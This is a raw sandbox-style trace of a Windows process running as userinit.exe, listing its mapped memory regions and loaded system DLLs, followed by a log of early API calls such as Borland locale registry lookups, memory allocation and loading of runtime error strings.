region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4331
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4332
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4333
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 4334
start_va = 0x6d0000
end_va = 0x12cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 4335
start_va = 0x1470000
end_va = 0x147ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 4336
start_va = 0x12d0000
end_va = 0x13cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000012d0000"
filename = ""
Region:
id = 4337
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4338
start_va = 0x160000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 4342
start_va = 0x1480000
end_va = 0x155efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001480000"
filename = ""
Region:
id = 4343
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 4344
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4345
start_va = 0x1560000
end_va = 0x175ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001560000"
filename = ""
Region:
id = 4346
start_va = 0x1760000
end_va = 0x208ffff
entry_point = 0x1760000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4347
start_va = 0x70000
end_va = 0x76fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 4348
start_va = 0x80000
end_va = 0x81fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 4349
start_va = 0x2090000
end_va = 0x2482fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002090000"
filename = ""
Region:
id = 4350
start_va = 0x330000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 4351
start_va = 0x1560000
end_va = 0x166cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001560000"
filename = ""
Region:
id = 4352
start_va = 0x1720000
end_va = 0x175ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001720000"
filename = ""
Region:
id = 4358
start_va = 0x2490000
end_va = 0x258ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002490000"
filename = ""
Region:
id = 4362
start_va = 0x2590000
end_va = 0x278ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 4365
start_va = 0x13d0000
end_va = 0x1450fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4366
start_va = 0x1670000
end_va = 0x16f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4367
start_va = 0x13d0000
end_va = 0x1454fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4368
start_va = 0x1670000
end_va = 0x16f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4372
start_va = 0x13d0000
end_va = 0x1458fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4373
start_va = 0x1670000
end_va = 0x16fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4374
start_va = 0x13d0000
end_va = 0x145cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4375
start_va = 0x1670000
end_va = 0x16fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4379
start_va = 0x13d0000
end_va = 0x1460fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4380
start_va = 0x1670000
end_va = 0x1702fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4381
start_va = 0x13d0000
end_va = 0x1464fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4384
start_va = 0x1670000
end_va = 0x1706fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4385
start_va = 0x13d0000
end_va = 0x1468fff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4386
start_va = 0x1670000
end_va = 0x170afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4387
start_va = 0x13d0000
end_va = 0x146cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 4391
start_va = 0x1670000
end_va = 0x170efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4392
start_va = 0x2790000
end_va = 0x2830fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4393
start_va = 0x1670000
end_va = 0x1712fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4397
start_va = 0x2790000
end_va = 0x2834fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4398
start_va = 0x1670000
end_va = 0x1716fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4399
start_va = 0x2790000
end_va = 0x2838fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4402
start_va = 0x1670000
end_va = 0x171afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4403
start_va = 0x2790000
end_va = 0x283cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4404
start_va = 0x1670000
end_va = 0x171efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001670000"
filename = ""
Region:
id = 4407
start_va = 0x2790000
end_va = 0x2840fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4408
start_va = 0x2850000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4411
start_va = 0x2790000
end_va = 0x2844fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4412
start_va = 0x2850000
end_va = 0x2906fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4413
start_va = 0x2790000
end_va = 0x2848fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4416
start_va = 0x2850000
end_va = 0x290afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4417
start_va = 0x2790000
end_va = 0x284cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4420
start_va = 0x2850000
end_va = 0x290efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4421
start_va = 0x2910000
end_va = 0x29d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 4422
start_va = 0x2790000
end_va = 0x2852fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4425
start_va = 0x2860000
end_va = 0x2924fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4426
start_va = 0x2790000
end_va = 0x2856fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4429
start_va = 0x2860000
end_va = 0x2928fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4430
start_va = 0x2790000
end_va = 0x285afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4433
start_va = 0x2860000
end_va = 0x292cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4434
start_va = 0x2790000
end_va = 0x285efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4437
start_va = 0x2860000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4438
start_va = 0x2940000
end_va = 0x2a12fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 4440
start_va = 0x2790000
end_va = 0x2864fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4441
start_va = 0x2870000
end_va = 0x2946fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4444
start_va = 0x2790000
end_va = 0x2868fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4445
start_va = 0x2870000
end_va = 0x294afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4447
start_va = 0x2790000
end_va = 0x286cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4448
start_va = 0x2870000
end_va = 0x294efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4451
start_va = 0x2950000
end_va = 0x2a30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 4452
start_va = 0x2790000
end_va = 0x2872fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4455
start_va = 0x2880000
end_va = 0x2964fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4456
start_va = 0x2790000
end_va = 0x2876fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4457
start_va = 0x2880000
end_va = 0x2968fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4460
start_va = 0x2790000
end_va = 0x287afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4461
start_va = 0x2880000
end_va = 0x296cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4474
start_va = 0x2790000
end_va = 0x287efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4475
start_va = 0x2880000
end_va = 0x2970fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4480
start_va = 0x2980000
end_va = 0x2a72fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 4481
start_va = 0x2790000
end_va = 0x2884fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4490
start_va = 0x2890000
end_va = 0x2986fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4491
start_va = 0x2790000
end_va = 0x2888fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4507
start_va = 0x2890000
end_va = 0x298afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4508
start_va = 0x2790000
end_va = 0x288cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4512
start_va = 0x2890000
end_va = 0x298efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4513
start_va = 0x2990000
end_va = 0x2a90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 4514
start_va = 0x2790000
end_va = 0x2892fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4515
start_va = 0x28a0000
end_va = 0x29a4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4516
start_va = 0x2790000
end_va = 0x2896fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4517
start_va = 0x28a0000
end_va = 0x29a8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4518
start_va = 0x2790000
end_va = 0x289afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4519
start_va = 0x28a0000
end_va = 0x29acfff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4520
start_va = 0x2790000
end_va = 0x289ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4521
start_va = 0x29b0000
end_va = 0x2ac2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 4522
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4523
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4524
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4525
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4526
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4527
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4528
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4529
start_va = 0x90000
end_va = 0x90fff
entry_point = 0x90000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4530
start_va = 0x2ad0000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ad0000"
filename = ""
Region:
id = 4531
start_va = 0xa0000
end_va = 0xa0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 4532
start_va = 0x6d770000
end_va = 0x6d788fff
entry_point = 0x6d770000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4533
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4534
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4535
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4536
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4537
start_va = 0x590000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 4538
start_va = 0x2cb0000
end_va = 0x2daffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cb0000"
filename = ""
Region:
id = 4539
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 4540
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4541
start_va = 0x2db0000
end_va = 0x307efff
entry_point = 0x2db0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4542
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 4543
start_va = 0x1b0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4544
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4545
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x170000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4546
start_va = 0x180000
end_va = 0x181fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 4547
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4548
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4549
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 4550
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4551
start_va = 0x2e0000
end_va = 0x30bfff
entry_point = 0x2e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4552
start_va = 0x190000
end_va = 0x197fff
entry_point = 0x190000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4553
start_va = 0x1a0000
end_va = 0x1affff
entry_point = 0x1a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4554
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4555
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4556
start_va = 0x3080000
end_va = 0x31cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003080000"
filename = ""
Region:
id = 4557
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4558
start_va = 0x31d0000
end_va = 0x33effff
entry_point = 0x0
region_type = private
name = "private_0x00000000031d0000"
filename = ""
Region:
id = 4559
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4560
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4561
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4562
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4563
start_va = 0x2bd0000
end_va = 0x2c8ffff
entry_point = 0x2bd0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 265
os_tid = 0x8a0
[0137.873] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0137.873] GetKeyboardType (nTypeFlag=0) returned 4
[0137.873] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0137.873] GetStartupInfoA (in: lpStartupInfo=0xef934 | out: lpStartupInfo=0xef934*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0137.873] GetVersion () returned 0x1db10106
[0137.873] GetVersion () returned 0x1db10106
[0137.873] GetCurrentThreadId () returned 0x8a0
[0137.873] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xef430, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.873] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xef30b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.873] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef420 | out: phkResult=0xef420*=0x0) returned 0x2
[0137.874] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef420 | out: phkResult=0xef420*=0x0) returned 0x2
[0137.874] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xef420 | out: phkResult=0xef420*=0x0) returned 0x2
[0137.874] lstrcpynA (in: lpString1=0xef30b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0137.874] GetThreadLocale () returned 0x409
[0137.874] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xef41b, cchData=5 | out: lpLCData="ENU") returned 4
[0137.875] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0137.875] lstrcpynA (in: lpString1=0xef328, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0137.875] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0137.875] lstrcpynA (in: lpString1=0xef328, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0137.875] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0137.875] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0137.875] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5e3640
[0137.876] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x12d0000
[0137.876] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5e4640
[0137.876] VirtualAlloc (lpAddress=0x12d0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x12d0000
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0137.876] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0137.877] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0xef554, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
